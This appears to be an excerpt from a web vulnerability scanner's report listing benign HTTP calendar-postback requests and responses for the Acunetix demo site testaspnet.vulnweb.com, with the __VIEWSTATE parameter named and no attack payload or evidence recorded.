Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8374&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMASp1PW2ghkZGRtTUe17YVCaVO7fvdc6WsaDcTiVA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQxbmcDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKC%2BhMq1IC2TVB4hY3AYh2t3Il%2BP
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:28 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMASp1PW2ghkZGRtTUe17YVCaVO7fvdc6WsaDcTiVA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQxbmcDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKC+hMq1IC2TVB4hY3AYh2t3Il+P" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:White" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8382&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBg%2Bpzc2ghkZGQwQ8uyvdgPKLn5O7d5YBiq2eIaqQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLno%2FYSAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEfM%2FWqblC0QhGeXV1zAVR67wK1LQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:44 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBg+pzc2ghkZGQwQ8uyvdgPKLn5O7d5YBiq2eIaqQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLno/YSAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEfM/WqblC0QhGeXV1zAVR67wK1LQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:White" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
